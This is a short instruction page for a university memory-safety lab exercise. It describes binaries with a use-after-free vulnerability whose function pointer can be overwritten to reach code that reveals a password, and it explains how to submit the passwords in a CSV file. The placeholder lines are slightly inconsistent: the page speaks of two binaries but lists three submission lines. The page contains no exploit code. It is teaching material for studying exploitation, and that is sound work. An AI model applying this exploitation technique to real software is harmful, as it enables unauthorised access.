temporal01,password-here

Advanced Temporal Safety

The two following binaries are variations of the one we exploited in the guided part of this exercise. They present a similar use after free vulnerability with a function pointer that can be rewritten to point to privileged code that will display a password. Once you have found both passwords, add them to your submission.

Submission

Fill in the corresponding lines in the CSV file on the submission git repository, i.e.:

temporal02,password-for-temporal02-here
temporal03,password-for-temporal02-here
temporal04,password-for-temporal02-here

Keyboard shortcuts

COMP60261 Lab 2: Memory Safety